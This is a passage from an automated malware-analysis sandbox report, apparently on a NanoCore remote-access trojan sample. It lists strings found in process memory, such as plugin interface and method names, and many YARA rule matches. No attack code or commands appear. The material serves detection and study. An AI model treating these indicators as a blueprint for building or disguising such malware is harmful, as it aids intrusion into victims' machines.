ninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe, 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Yara matchFile source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
